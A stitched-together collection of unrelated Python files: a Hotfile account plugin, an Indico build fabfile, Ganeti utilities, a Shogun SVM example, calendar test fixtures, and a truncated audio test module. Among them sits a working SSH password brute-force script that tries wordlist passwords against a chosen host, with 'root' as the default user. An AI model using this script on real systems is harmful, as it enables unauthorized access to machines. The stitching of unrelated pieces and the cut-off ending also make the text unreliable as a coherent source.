You should have received a copy of the GNU General Public License
along with this program; if not, see <http://www.gnu.org/licenses/>.
@author: mkaay, JoKoT3
"""
from time import strptime, mktime
import hashlib
from module.plugins.Account import Account
class HotfileCom(Account):
__name__ = "HotfileCom"
__version__ = "0.2"
__type__ = "account"
__description__ = """hotfile.com account plugin"""
__author_name__ = ("mkaay", "JoKoT3")
__author_mail__ = ("[email protected]", "[email protected]")
def loadAccountInfo(self, user, req):
resp = self.apiCall("getuserinfo", user=user)
if resp.startswith("."):
self.core.debug("HotfileCom API Error: %s" % resp)
raise Exception
info = {}
for p in resp.split("&"):
key, value = p.split("=")
info[key] = value
if info['is_premium'] == '1':
info["premium_until"] = info["premium_until"].replace("T", " ")
zone = info["premium_until"][19:]
info["premium_until"] = info["premium_until"][:19]
zone = int(zone[:3])
validuntil = int(mktime(strptime(info["premium_until"], "%Y-%m-%d %H:%M:%S"))) + (zone * 3600)
tmp = {"validuntil": validuntil, "trafficleft": -1, "premium": True}
elif info['is_premium'] == '0':
tmp = {"premium": False}
return tmp
def apiCall(self, method, post={}, user=None):
if user:
data = self.getAccountData(user)
else:
user, data = self.selectAccount()
req = self.getAccountRequest(user)
digest = req.load("http://api.hotfile.com/", post={"action": "getdigest"})
h = hashlib.md5()
h.update(data["password"])
hp = h.hexdigest()
h = hashlib.md5()
h.update(hp)
h.update(digest)
pwhash = h.hexdigest()
post.update({"action": method})
post.update({"username": user, "passwordmd5dig": pwhash, "digest": digest})
resp = req.load("http://api.hotfile.com/", post=post)
req.close()
return resp
def login(self, user, data, req):
cj = self.getAccountCookies(user)
cj.setCookie("hotfile.com", "lang", "en")
req.load("http://hotfile.com/", cookies=True)
page = req.load("http://hotfile.com/login.php", post={"returnto": "/", "user": user, "pass": data["password"]},
cookies=True)
if "Bad username/password" in page:
self.wrongPassword()
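# Hedged note (standalone sketch, not used by the plugin): apiCall() above
# derives passwordmd5dig as md5(md5(password) + digest), i.e. the hex MD5 of
# the password re-hashed together with the server-issued digest.
def _example_password_digest(password, digest):
    inner = hashlib.md5(password).hexdigest()
    return hashlib.md5(inner + digest).hexdigest()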
|
# -*- coding: utf-8 -*-
##
##
## This file is part of Indico
## Copyright (C) 2002 - 2014 European Organization for Nuclear Research (CERN)
##
## Indico is free software: you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation, either version 3 of the
## License, or (at your option) any later version.
##
## Indico is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Indico. If not, see <http://www.gnu.org/licenses/>.
"""
fabfile for Indico development operations
"""
import os
import re
import sys
import glob
import shutil
import json
import getpass
from contextlib import contextmanager
from urlparse import urljoin
import operator
from fabric.api import local, lcd, task, env
from fabric.context_managers import prefix, settings
from fabric.colors import red, green, yellow, cyan
from fabric.contrib import console
ASSET_TYPES = ['js', 'sass', 'css']
DOC_DIRS = ['guides']
RECIPES = {}
env.conf = 'fabfile.conf'
env.src_dir = os.path.dirname(__file__)
execfile(env.conf, {}, env)
env.ext_dir = os.path.join(env.src_dir, env.ext_dirname)
env.target_dir = os.path.join(env.src_dir, env.target_dirname)
env.node_env_path = os.path.join(env.src_dir, env.node_env_dirname)
def recipe(name):
    def _wrapper(f):
        RECIPES[name] = f
        return f  # keep the module-level name bound to the recipe function
    return _wrapper
# Decorators
@contextmanager
def node_env():
if env.system_node:
yield
else:
        # ICTP: activating the node virtualenv here raises an error, so fall
        # back to the system environment instead.
        #with prefix('. {0}'.format(os.path.join(env.node_env_path, 'bin/activate'))):
yield
@contextmanager
def pyenv_env(version):
cmd_dir = os.path.join(env.pyenv_dir, 'versions', 'indico-build-{0}'.format(version), 'bin')
with prefix('PATH={0}:$PATH'.format(cmd_dir)):
yield
def pyenv_cmd(cmd, **kwargs):
cmd_dir = os.path.join(env.pyenv_dir, 'bin')
return local('{0}/pyenv {1}'.format(cmd_dir, cmd), **kwargs)
# Util functions
def create_node_env():
with settings(warn_only=True):
local('nodeenv -c -n {0} {1}'.format(env.node_version, env.node_env_path))
def lib_dir(src_dir, dtype):
target_dir = os.path.join(src_dir, 'indico', 'htdocs')
return os.path.join(target_dir, dtype, 'lib')
def _check_pyenv(py_versions):
"""
Check that pyenv is installed and set up the compilers/virtual envs
in case they do not exist
"""
if not os.path.isdir(env.pyenv_dir):
print red("Can't find pyenv!")
print yellow("Are you sure you have installed it?")
sys.exit(-2)
# list available pyenv versions
av_versions = list(entry.strip() for entry in pyenv_cmd('versions', capture=True).split('\n')[1:])
for py_version in py_versions:
        if py_version not in av_versions:
print green('Installing Python {0}'.format(py_version))
pyenv_cmd('install {0}'.format(py_version), capture=True)
pyenv_cmd("virtualenv -f {0} indico-build-{0}".format(py_version))
def _check_present(executable, message="Please install it first."):
"""
Check that executable exists in $PATH
"""
with settings(warn_only=True):
if local('which {0} > /dev/null && echo $?'.format(executable), capture=True) != '0':
print red('{0} is not available in this system. {1}'.format(executable, message))
sys.exit(-2)
def _safe_rm(path, recursive=False, ask=True):
if path[0] != '/':
path = os.path.join(env.lcwd, path)
if ask:
files = glob.glob(path)
if files:
print yellow("The following files are going to be deleted:\n ") + '\n '.join(files)
if console.confirm(cyan("Are you sure you want to delete them?")):
local('rm {0}{1}'.format('-rf ' if recursive else '', path))
else:
print red("Delete operation cancelled")
else:
local('rm {0}{1}'.format('-rf ' if recursive else '', path))
def _cp_tree(dfrom, dto, exclude=[]):
"""
Simple copy with exclude option
"""
if dfrom[0] != '/':
dfrom = os.path.join(env.lcwd, dfrom)
if dto[0] != '/':
dto = os.path.join(env.lcwd, dto)
print "{0} -> {1}".format(dfrom, dto)
shutil.copytree(dfrom, dto, ignore=shutil.ignore_patterns(*exclude))
def _find_most_recent(path, cmp=operator.gt, maxt=0):
for dirpath, __, fnames in os.walk(path):
for fname in fnames:
# ignore hidden files and ODTs
if fname.startswith(".") or fname.endswith(".odt"):
continue
mtime = os.stat(os.path.join(dirpath, fname)).st_mtime
if cmp(mtime, maxt):
maxt = mtime
return maxt
def _find_least_recent(path):
return _find_most_recent(path, cmp=operator.lt, maxt=sys.maxint)
def _install_dependencies(mod_name, sub_path, dtype, dest_subpath=None):
l_dir = lib_dir(env.src_dir, dtype)
dest_dir = os.path.join(l_dir, dest_subpath) if dest_subpath else l_dir
local('mkdir -p {0}'.format(dest_dir))
local('cp -R {0} {1}/'.format(
os.path.join(env.ext_dir, mod_name, sub_path),
dest_dir))
# Recipes
@recipe('angular')
def install_angular():
"""
Install Angular.js from Git
"""
with node_env():
with lcd(os.path.join(env.ext_dir, 'angular')):
local('npm install')
local('grunt clean buildall copy write compress')
dest_dir_js = lib_dir(env.src_dir, 'js')
dest_dir_css = lib_dir(env.src_dir, 'css')
local('mkdir -p {0}'.format(dest_dir_js))
local('cp build/angular.js {0}/'.format(dest_dir_js))
local('cp build/angular-resource.js {0}/'.format(dest_dir_js))
local('cp build/angular-sanitize.js {0}/'.format(dest_dir_js))
local('cp css/angular.css {0}'.format(dest_dir_css))
@recipe('ui-sortable')
def install_ui_sortable():
"""
Install angular ui-sortable from Git
"""
with node_env():
with lcd(os.path.join(env.ext_dir, 'ui-sortable')):
dest_dir_js = lib_dir(env.src_dir, 'js')
local('mkdir -p {0}'.format(dest_dir_js))
local('cp src/sortable.js {0}/'.format(dest_dir_js))
@recipe('compass')
def install_compass():
"""
Install compass stylesheets from Git
"""
_install_dependencies('compass', 'frameworks/compass/stylesheets/*', 'sass', 'compass')
@recipe('jquery')
def install_jquery():
"""
Install jquery from Git
"""
with node_env():
with lcd(os.path.join(env.ext_dir, 'jquery')):
local('npm install')
local('grunt')
dest_dir = lib_dir(env.src_dir, 'js')
local('mkdir -p {0}'.format(dest_dir))
local('cp dist/jquery.js {0}/'.format(dest_dir))
@recipe('underscore')
def install_underscore():
"""
Install jquery from Git
"""
_install_dependencies('underscore', 'underscore.js', 'js')
@recipe('qtip2')
def install_qtip2():
"""
Install qtip2 from Git
"""
with node_env():
with lcd(os.path.join(env.ext_dir, 'qtip2')):
local('npm install')
local('grunt --plugins="tips modal viewport svg" init clean concat:dist concat:css concat:libs replace')
dest_dir_js, dest_dir_css = lib_dir(env.src_dir, 'js'), lib_dir(env.src_dir, 'css')
local('mkdir -p {0} {1}'.format(dest_dir_js, dest_dir_css))
local('cp dist/jquery.qtip.js {0}/'.format(dest_dir_js))
local('cp dist/jquery.qtip.css {0}/'.format(dest_dir_css))
@recipe('jquery-ui-multiselect')
def install_jquery_ui_multiselect():
"""
Install jquery ui multiselect widget from Git
"""
with node_env():
with lcd(os.path.join(env.ext_dir, 'jquery-ui-multiselect')):
dest_dir_js = lib_dir(env.src_dir, 'js')
dest_dir_css = lib_dir(env.src_dir, 'css')
local('mkdir -p {0} {1}'.format(dest_dir_js, dest_dir_css))
local('cp src/jquery.multiselect.js {0}/'.format(dest_dir_js))
local('cp src/jquery.multiselect.filter.js {0}/'.format(dest_dir_js))
local('cp jquery.multiselect.css {0}/'.format(dest_dir_css))
local('cp jquery.multiselect.filter.css {0}/'.format(dest_dir_css))
@recipe('MathJax')
def install_mathjax():
"""
Install MathJax from Git
"""
dest_dir = os.path.join(lib_dir(env.src_dir, 'js'), 'mathjax/')
mathjax_js = os.path.join(dest_dir, 'MathJax.js')
with lcd(os.path.join(env.ext_dir, 'mathjax')):
local('rm -rf {0}'.format(os.path.join(dest_dir)))
_cp_tree('unpacked/', dest_dir, exclude=["AM*", "MML*", "Accessible*", "Safe*"])
_cp_tree('images/', os.path.join(dest_dir, 'images'))
_cp_tree('fonts/', os.path.join(dest_dir, 'fonts'), exclude=["png"])
with open(mathjax_js, 'r') as f:
data = f.read()
# Uncomment 'isPacked = true' line
    data = re.sub(r'//\s*(MathJax\.isPacked\s*=\s*true\s*;)', r'\1', data,
                  flags=re.MULTILINE)
with open(mathjax_js, 'w') as f:
f.write(data)
@recipe('PageDown')
def install_pagedown():
"""
Install PageDown from Git (mirror!)
"""
with lcd(os.path.join(env.ext_dir, 'pagedown')):
dest_dir = os.path.join(lib_dir(env.src_dir, 'js'), 'pagedown/')
local('mkdir -p {0}'.format(dest_dir))
local('cp *.js {0}'.format(dest_dir))
# Tasks
@task
def install(recipe_name):
"""
Install a module given the recipe name
"""
RECIPES[recipe_name]()
@task
def init_submodules(src_dir='.'):
"""
Initialize submodules (fetch them from external Git repos)
"""
print green("Initializing submodules")
with lcd(src_dir):
local('pwd')
local('git submodule update --init --recursive')
def _install_deps():
"""
Install asset dependencies
"""
print green("Installing asset dependencies...")
for recipe_name in RECIPES:
print cyan("Installing {0}".format(recipe_name))
install(recipe_name)
@task
def setup_deps(n_env=None, n_version=None, src_dir=None, system_node=None):
"""
Setup (fetch and install) dependencies for Indico assets
"""
src_dir = src_dir or env.src_dir
n_env = n_env or env.node_env_path
system_node = system_node if system_node is not None else env.system_node
# initialize submodules if they haven't yet been
init_submodules(src_dir)
ext_dir = os.path.join(src_dir, 'ext_modules')
_check_present('curl')
with settings(node_env_path=n_env or os.path.join(ext_dir, 'node_env'),
node_version=n_version or env.node_version,
system_node=system_node,
src_dir=src_dir,
ext_dir=ext_dir):
if not system_node and not os.path.exists(n_env):
create_node_env()
with node_env():
local('npm install -g grunt-cli')
_install_deps()
@task
def clean_deps(src_dir=None):
"""
Clean up generated files
"""
for dtype in ASSET_TYPES:
_safe_rm('{0}/*'.format(lib_dir(src_dir or env.src_dir, dtype)), recursive=True)
@task
def cleanup(build_dir=None, force=False):
"""
Clean up build environment
"""
_safe_rm('{0}'.format(build_dir or env.build_dir), recursive=True, ask=(not force))
@task
def tarball(src_dir=None):
"""
Create a binary indico distribution
"""
src_dir = src_dir or env.src_dir
make_docs(src_dir)
setup_deps(n_env=os.path.join(src_dir, 'ext_modules', 'node_env'),
src_dir=src_dir)
local('python setup.py -q sdist')
@task
def make_docs(src_dir=None, build_dir=None, force=False):
"""
Generate Indico docs
"""
src_dir = src_dir or env.src_dir
doc_src_dir = os.path.join(src_dir, 'doc')
if build_dir is None:
target_dir = os.path.join(src_dir, 'indico', 'htdocs', 'ihelp')
else:
target_dir = os.path.join(build_dir or env.build_dir, 'indico', 'htdocs', 'ihelp')
if not force:
print yellow("Checking if docs need to be generated... "),
if _find_most_recent(target_dir) > _find_most_recent(doc_src_dir):
print green("Nope.")
return
print red("Yes :(")
_check_present('pdflatex')
print green('Generating documentation')
with lcd(doc_src_dir):
for d in DOC_DIRS:
with lcd(d):
local('make html')
local('make latex')
local('rm -rf {0}/*'.format(os.path.join(target_dir, 'html')))
local('mv build/html/* {0}'.format(os.path.join(target_dir, 'html')))
with lcd(os.path.join('guides', 'build', 'latex')):
local('make all-pdf')
local('mv *.pdf {0}'.format(os.path.join(target_dir, 'pdf')))
print green('Cleaning up')
for d in DOC_DIRS:
with lcd(d):
local('make clean')
@task
def package_release(py_versions=None, system_node=False, indico_versions=None, upstream=None, no_clean=False, force_clean=False):
"""
Create an Indico release - source and binary distributions
"""
DEVELOP_REQUIRES = ['pojson>=0.4', 'termcolor', 'werkzeug', 'nodeenv', 'fabric',
'sphinx', 'repoze.sphinx.autointerface']
py_versions = py_versions.split('/') if py_versions else env.py_versions
_check_pyenv(py_versions)
if not no_clean:
if not force_clean and not console.confirm(red("This will reset your repository to its initial "
"state (you will lose all files that are not under Git version control). Do you want to continue?"),
default=False):
sys.exit(2)
local('git clean -dx')
with pyenv_env(py_versions[-1]):
local('pip -q install {0}'.format(' '.join(DEVELOP_REQUIRES + ['babel'])))
print green('Generating '), cyan('tarball')
with settings(system_node=system_node):
# Build source tarball
tarball(os.path.dirname(__file__))
# Build binaries (EGG)
for py_version in py_versions:
with pyenv_env(py_version):
print green('Generating '), cyan('egg for Python {0}'.format(py_version))
local('pip -q install {0}'.format(' '.join(DEVELOP_REQUIRES + ['babel'])))
local('python setup.py -q bdist_egg')
print green(local('ls -lah dist/', capture=True))
|
#
#
# Copyright (C) 2006, 2007, 2010, 2011, 2012 Google Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA.
"""Utility functions wrapping other functions.
"""
import sys
import time
import socket
import errno
import tempfile
import fcntl
import os
import select
import logging
def TestDelay(duration):
"""Sleep for a fixed amount of time.
@type duration: float
@param duration: the sleep duration
  @rtype: tuple
  @return: (False, error message) if duration is negative, (True, None) otherwise
"""
if duration < 0:
return False, "Invalid sleep duration"
time.sleep(duration)
return True, None
def CloseFdNoError(fd, retries=5):
"""Close a file descriptor ignoring errors.
@type fd: int
@param fd: the file descriptor
@type retries: int
@param retries: how many retries to make, in case we get any
other error than EBADF
"""
try:
os.close(fd)
except OSError, err:
if err.errno != errno.EBADF:
if retries > 0:
CloseFdNoError(fd, retries - 1)
# else either it's closed already or we're out of retries, so we
# ignore this and go on
def SetCloseOnExecFlag(fd, enable):
"""Sets or unsets the close-on-exec flag on a file descriptor.
@type fd: int
@param fd: File descriptor
@type enable: bool
@param enable: Whether to set or unset it.
"""
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
if enable:
flags |= fcntl.FD_CLOEXEC
else:
flags &= ~fcntl.FD_CLOEXEC
fcntl.fcntl(fd, fcntl.F_SETFD, flags)
def SetNonblockFlag(fd, enable):
"""Sets or unsets the O_NONBLOCK flag on on a file descriptor.
@type fd: int
@param fd: File descriptor
@type enable: bool
@param enable: Whether to set or unset it
"""
flags = fcntl.fcntl(fd, fcntl.F_GETFL)
if enable:
flags |= os.O_NONBLOCK
else:
flags &= ~os.O_NONBLOCK
fcntl.fcntl(fd, fcntl.F_SETFL, flags)
def RetryOnSignal(fn, *args, **kwargs):
"""Calls a function again if it failed due to EINTR.
"""
while True:
try:
return fn(*args, **kwargs)
except EnvironmentError, err:
if err.errno != errno.EINTR:
raise
except (socket.error, select.error), err:
# In python 2.6 and above select.error is an IOError, so it's handled
# above, in 2.5 and below it's not, and it's handled here.
if not (err.args and err.args[0] == errno.EINTR):
raise
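# Hedged usage sketch (not part of Ganeti): wrapping an interruptible system
# call so that EINTR causes a transparent retry. fd and size are illustrative.
def _ExampleRetryRead(fd, size=4096):
  return RetryOnSignal(os.read, fd, size)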
def IgnoreProcessNotFound(fn, *args, **kwargs):
"""Ignores ESRCH when calling a process-related function.
ESRCH is raised when a process is not found.
@rtype: bool
@return: Whether process was found
"""
try:
fn(*args, **kwargs)
except EnvironmentError, err:
# Ignore ESRCH
if err.errno == errno.ESRCH:
return False
raise
return True
def IgnoreSignals(fn, *args, **kwargs):
"""Tries to call a function ignoring failures due to EINTR.
"""
try:
return fn(*args, **kwargs)
except EnvironmentError, err:
if err.errno == errno.EINTR:
return None
else:
raise
except (select.error, socket.error), err:
# In python 2.6 and above select.error is an IOError, so it's handled
# above, in 2.5 and below it's not, and it's handled here.
if err.args and err.args[0] == errno.EINTR:
return None
else:
raise
def GetClosedTempfile(*args, **kwargs):
"""Creates a temporary file and returns its path.
"""
(fd, path) = tempfile.mkstemp(*args, **kwargs)
CloseFdNoError(fd)
return path
def IsExecutable(filename):
"""Checks whether a file exists and is executable.
@type filename: string
@param filename: Filename
@rtype: bool
"""
return os.path.isfile(filename) and os.access(filename, os.X_OK)
def ResetTempfileModule(_time=time.time):
"""Resets the random name generator of the tempfile module.
This function should be called after C{os.fork} in the child process to
ensure it creates a newly seeded random generator. Otherwise it would
generate the same random parts as the parent process. If several processes
race for the creation of a temporary file, this could lead to one not getting
a temporary name.
"""
# pylint: disable=W0212
if ((sys.hexversion >= 0x020703F0 and sys.hexversion < 0x03000000) or
sys.hexversion >= 0x030203F0):
# Python 2.7 automatically resets the RNG on pid changes (i.e. forking)
return
try:
lock = tempfile._once_lock
lock.acquire()
try:
# Re-seed random name generator
if tempfile._name_sequence:
tempfile._name_sequence.rng.seed(hash(_time()) ^ os.getpid())
finally:
lock.release()
except AttributeError:
logging.critical("The tempfile module misses at least one of the"
" '_once_lock' and '_name_sequence' attributes")
|
from pexpect import pxssh
import optparse
import time
from threading import *
maxConnections=2
connection_lock=BoundedSemaphore(value=maxConnections)
Found=False
Fails=0
def connect(host,user,password,release):
global Fails
global Found
try:
s=pxssh.pxssh()
s.login(host,user,password)
print('[+] Password found '+password)
Found=True
except Exception, e:
if 'read_nonblocking' in str(e):
Fails+=1
time.sleep(5)
connect(host,user,password,False)
elif 'synchronize with original prompt' in str(e):
time.sleep(1)
connect(host,user,password,False)
finally:
if release:
connection_lock.release()
def main():
    parser = optparse.OptionParser('usage: %prog -H <Host> -F <PasswdFile> -u <User>')
parser.add_option('-H',dest='targetHost',type='string',help='specify hostname')
parser.add_option('-F',dest='passwdFile',default='rockyou.txt',type='string',help='specify password file')
parser.add_option('-u',dest='user',default='root',type='string',help='specify user')
(options,args)=parser.parse_args()
host=options.targetHost
passwdFile=options.passwdFile
user=options.user
    if host is None:
print(parser.usage)
exit(0)
fn=open(passwdFile,'r')
for line in fn.readlines():
if Found:
print("[*] Exiting: Password Found")
exit(0)
if Fails>5:
print("[!] Exiting: Too Many Socket Timeouts")
exit(0)
connection_lock.acquire()
password = line.strip('\r').strip('\n')
print("[-] Testing: "+str(password))
        t = Thread(target=connect, args=(host, user, password, True))
        t.start()  # Thread.start() returns None; there is no handle to keep
if __name__ == '__main__':
main()
|
#!/usr/bin/env python
import numpy as np
def gen_data(num_classes,num_samples,dim):
np.random.seed(0)
covs = np.array([[[0., -1. ], [2.5, .7]],
[[3., -1.5], [1.2, .3]],
[[ 2, 0 ], [ .0, 1.5 ]]])
X = np.r_[np.dot(np.random.randn(num_samples, dim), covs[0]) + np.array([0, 10]),
np.dot(np.random.randn(num_samples, dim), covs[1]) + np.array([-10, -10]),
np.dot(np.random.randn(num_samples, dim), covs[2]) + np.array([10, -10])];
Y = np.hstack((np.zeros(num_samples), np.ones(num_samples), 2*np.ones(num_samples)))
return X, Y
# Number of classes
M = 3
# Number of samples of each class
N = 50
# Dimension of the data
dim = 2
traindat, label_traindat = gen_data(M,N,dim)
parameter_list = [[traindat,label_traindat]]
def structure_multiclass_bmrm(fm_train_real=traindat,label_train_multiclass=label_traindat):
from shogun import MulticlassSOLabels, LabelsFactory
from shogun import RealFeatures
from shogun import SOSVMHelper
try:
from shogun import BMRM, PPBMRM, P3BMRM, DualLibQPBMSOSVM
except ImportError:
print("At least one of BMRM, PPBMRM, P3BMRM, DualLibQPBMSOSVM not available")
exit(0)
from shogun import MulticlassModel, RealNumber
labels = MulticlassSOLabels(label_train_multiclass)
features = RealFeatures(fm_train_real.T)
model = MulticlassModel(features, labels)
sosvm = DualLibQPBMSOSVM(model, labels, 1.0)
# BMRM
sosvm.set_solver(BMRM)
sosvm.set_verbose(True)
sosvm.train()
bmrm_out = LabelsFactory.to_multiclass_structured(sosvm.apply())
count = 0
for i in range(bmrm_out.get_num_labels()):
yi_pred = RealNumber.obtain_from_generic(bmrm_out.get_label(i))
if yi_pred.value == label_train_multiclass[i]:
count = count + 1
#print("BMRM: Correct classification rate: %0.2f" % ( 100.0*count/bmrm_out.get_num_labels() ))
#hp = sosvm.get_helper()
#print hp.get_primal_values()
#print hp.get_train_errors()
# PPBMRM
w = np.zeros(model.get_dim())
sosvm.set_w(w)
sosvm.set_solver(PPBMRM)
sosvm.set_verbose(True)
sosvm.train()
ppbmrm_out = LabelsFactory.to_multiclass_structured(sosvm.apply())
count = 0
for i in range(ppbmrm_out.get_num_labels()):
yi_pred = RealNumber.obtain_from_generic(ppbmrm_out.get_label(i))
if yi_pred.value == label_train_multiclass[i]:
count = count + 1
#print("PPBMRM: Correct classification rate: %0.2f" % ( 100.0*count/ppbmrm_out.get_num_labels() ))
# P3BMRM
w = np.zeros(model.get_dim())
sosvm.set_w(w)
sosvm.set_solver(P3BMRM)
sosvm.set_verbose(True)
sosvm.train()
p3bmrm_out = LabelsFactory.to_multiclass_structured(sosvm.apply())
count = 0
for i in range(p3bmrm_out.get_num_labels()):
yi_pred = RealNumber.obtain_from_generic(p3bmrm_out.get_label(i))
if yi_pred.value == label_train_multiclass[i]:
count = count + 1
#print("P3BMRM: Correct classification rate: %0.2f" % ( 100.0*count/p3bmrm_out.get_num_labels() ))
return bmrm_out, ppbmrm_out, p3bmrm_out
if __name__=='__main__':
print('SO multiclass model with bundle methods')
a,b,c=structure_multiclass_bmrm(*parameter_list[0])
|
"""Utility functions for test cases."""
from datetime import datetime, time
from decimal import Decimal
class MockRequest404Response():
"""A mock of requests 404 response."""
def __init__(self, url, headers, data=None):
self.url = url
self.headers = headers
self.status_code = 404
self.data = data
self.text = 'Mock 404 error'
class MockRequest200Response():
"""A mock of request 200 response with custom text."""
def __init__(self, url, headers, data=None):
self.url = url
self.headers = headers
self.status_code = 200
self.data = data
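# Hedged usage sketch: the mocks above typically stand in for requests
# responses inside a unittest.mock.patch block. The values are illustrative.
def _example_mock_response():
    response = MockRequest404Response(
        'https://127.0.0.1/api/shifts/', {'user-agent': 'rdrhc-calendar'}
    )
    assert response.status_code == 404
    assert response.text == 'Mock 404 error'
    return response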
APP_CONFIG = {
'api_url': 'https://127.0.0.1/api/',
'api_headers': {'user-agent': 'rdrhc-calendar',},
'calendar_defaults': {
'weekday_start': time(1, 0, 0),
'weekday_duration': Decimal('1.1'),
'weekend_start': time(5, 0, 0),
'weekend_duration': Decimal('5.5'),
'stat_start': time(9, 0, 0),
'stat_duration': Decimal('9.9'),
},
'email': {
'server': 'https://127.0.0.1/',
'from_name': 'App Owner',
'from_email': '[email protected]',
'unsubscribe_link': 'https://127.0.0.1/unsubscribe/',
'owner_name': 'App Owner',
'owner_email': '[email protected]',
},
'debug': {
'email_console': True,
},
}
USER = {
'id': 1,
'sb_user': 10,
'name': 'Test User',
'calendar_name': 'SecretCalendar',
}
# Mock old and new schedules with additions, changes, deletions,
# missing shift codes, and null shift codes
OLD_SCHEDULE = {
'2018-01-01': [
{"shift_code": "C1", "start_date": "2018-01-01"},
],
'2018-02-01': [
{"shift_code": "C1", "start_date": "2018-02-01"},
],
'2018-03-01': [
{"shift_code": "C1", "start_date": "2018-03-01"},
{"shift_code": "vr", "start_date": "2018-03-01"},
],
'2018-04-01': [
{"shift_code": "C1", "start_date": "2018-04-01"},
{"shift_code": "D1", "start_date": "2018-04-01"},
],
'2018-05-01': [
{"shift_code": "C1", "start_date": "2018-05-01"},
{"shift_code": "C2", "start_date": "2018-04-01"},
],
'2018-06-01': [
{"shift_code": "C1", "start_date": "2018-06-01"},
],
}
EXTRACTED_SCHEDULE = [
{
'shift_code': 'C1',
'start_date': datetime(2018, 1, 1),
'comment': 'SUPER STAT',
},
{
'shift_code': 'C1F',
'start_date': datetime(2018, 2, 1),
'comment': '',
},
{
'shift_code': 'C1',
'start_date': datetime(2018, 3, 1),
'comment': '',
},
{
'shift_code': 'vr',
'start_date': datetime(2018, 3, 1),
'comment': '',
},
{
'shift_code': 'D1',
'start_date': datetime(2018, 4, 1),
'comment': '',
},
{
'shift_code': 'C1',
'start_date': datetime(2018, 5, 1),
'comment': '',
},
{
'shift_code': 'C2',
'start_date': datetime(2018, 5, 1),
'comment': '',
},
{
'shift_code': 'A1',
'start_date': datetime(2018, 7, 1),
'comment': '',
},
{
'shift_code': 'C1',
'start_date': datetime(2018, 8, 1),
'comment': '',
},
{
'shift_code': 'WR',
'start_date': datetime(2018, 8, 1),
'comment': '',
},
]
NEW_SCHEDULE = [
{
'shift_code': 'C1',
'start_datetime': datetime(2018, 1, 1, 1, 0),
'end_datetime': datetime(2018, 1, 1, 2, 0),
'comment': 'SUPER STAT',
'shift_code_fk': 1,
},
{
'shift_code': 'C1F',
'start_datetime': datetime(2018, 2, 1, 2, 0),
'end_datetime': datetime(2018, 2, 1, 3, 0),
'comment': '',
'shift_code_fk': 2,
},
{
'shift_code': 'C1',
'start_datetime': datetime(2018, 3, 1, 3, 0),
'end_datetime': datetime(2018, 3, 1, 4, 0),
'comment': '',
'shift_code_fk': 1,
},
{
'shift_code': 'vr',
'start_datetime': datetime(2018, 3, 1, 3, 0),
'end_datetime': datetime(2018, 3, 1, 4, 0),
'comment': '',
'shift_code_fk': 2,
},
{
'shift_code': 'D1',
'start_datetime': datetime(2018, 4, 1, 4, 0),
'end_datetime': datetime(2018, 4, 1, 5, 0),
'comment': '',
'shift_code_fk': None,
},
{
'shift_code': 'C1',
'start_datetime': datetime(2018, 5, 1, 5, 0),
'end_datetime': datetime(2018, 5, 1, 6, 0),
'comment': '',
'shift_code_fk': 1,
},
{
'shift_code': 'C2',
'start_datetime': datetime(2018, 5, 1, 5, 0),
'end_datetime': datetime(2018, 5, 1, 6, 0),
'comment': '',
'shift_code_fk': None,
},
{
'shift_code': 'A1',
'start_datetime': datetime(2018, 7, 1, 7, 0),
'end_datetime': datetime(2018, 7, 1, 8, 0),
'comment': '',
'shift_code_fk': None,
},
{
'shift_code': 'C1',
'start_datetime': datetime(2018, 8, 1, 8, 0),
'end_datetime': datetime(2018, 8, 1, 9, 0),
'comment': '',
'shift_code_fk': 1,
},
]
# User-specific shift codes (for mocking API request)
USER_SHIFT_CODES = [
{
'id': 1, 'code': 'C1', 'sb_user': 1, 'role': 'p',
'stat_start': time(1, 0, 0), 'stat_duration': Decimal('1.1'),
'monday_start': time(2, 0, 0), 'monday_duration': Decimal('2.2'),
'tuesday_start': time(3, 0, 0), 'tuesday_duration': Decimal('3.3'),
'wednesday_start': time(4, 0, 0), 'wednesday_duration': Decimal('4.4'),
'thursday_start': time(5, 0, 0), 'thursday_duration': Decimal('5.5'),
'friday_start': time(6, 0, 0), 'friday_duration': Decimal('6.6'),
'saturday_start': time(7, 0, 0), 'saturday_duration': Decimal('7.7'),
'sunday_start': time(8, 0, 0), 'sunday_duration': Decimal('8.8'),
},
{
'id': 2, 'code': 'VR', 'sb_user': 1, 'role': 'p',
'stat_start': None, 'stat_duration': None,
'monday_start': None, 'monday_duration': None,
        'tuesday_start': None, 'tuesday_duration': None,
'wednesday_start': None, 'wednesday_duration': None,
'thursday_start': None, 'thursday_duration': None,
'friday_start': None, 'friday_duration': None,
'saturday_start': None, 'saturday_duration': None,
'sunday_start': None, 'sunday_duration': None,
},
{
'id': 3, 'code': 'WR', 'sb_user': None, 'role': 'p',
'stat_start': None, 'stat_duration': None,
'monday_start': None, 'monday_duration': None,
        'tuesday_start': None, 'tuesday_duration': None,
'wednesday_start': None, 'wednesday_duration': None,
'thursday_start': None, 'thursday_duration': None,
'friday_start': None, 'friday_duration': None,
'saturday_start': None, 'saturday_duration': None,
'sunday_start': None, 'sunday_duration': None,
},
]
# Stat holidays (for mocking API request)
STAT_HOLIDAYS = [
datetime(2018, 1, 1), datetime(2018, 2, 19), datetime(2018, 3, 30),
datetime(2018, 5, 21), datetime(2018, 7, 1), datetime(2018, 8, 6),
datetime(2018, 9, 3), datetime(2018, 10, 8), datetime(2018, 11, 11),
datetime(2018, 12, 25),
]
|
from test.test_support import findfile, TESTFN, unlink
import unittest
import array
import io
import pickle
import sys
import base64
class UnseekableIO(file):
def tell(self):
raise io.UnsupportedOperation
def seek(self, *args, **kwargs):
raise io.UnsupportedOperation
def fromhex(s):
return base64.b16decode(s.replace(' ', ''))
def byteswap2(data):
a = array.array('h')
a.fromstring(data)
a.byteswap()
return a.tostring()
def byteswap3(data):
ba = bytearray(data)
ba[::3] = data[2::3]
